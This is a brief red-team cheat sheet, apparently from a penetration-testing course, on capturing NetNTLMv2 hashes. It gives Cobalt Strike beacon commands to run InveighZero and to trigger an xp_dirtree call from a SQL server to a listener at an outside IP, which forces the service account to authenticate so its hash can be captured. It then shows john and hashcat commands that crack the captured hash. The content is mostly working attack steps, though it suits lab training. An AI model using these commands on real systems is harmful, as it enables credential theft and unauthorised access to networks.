NetNTLM Capture

https://github.com/Kevin-Robertson/InveighZero

beacon> execute-assembly C:\Tools\InveighZero\Inveigh\bin\Debug\Inveigh.exe -DNS N -LLMNR N -LLMNRv6 N -HTTP N -FileOutput N

beacon> powershell Get-SQLQuery -Instance srv-1.dev.cyberbotic.io -Query "EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1"

john --format=netntlmv2 --wordlist=wordlist svc_mssql-netntlmv2
hashcat -a 0 -m 5600 svc_mssql-netntlmv2 wordlist

Last updated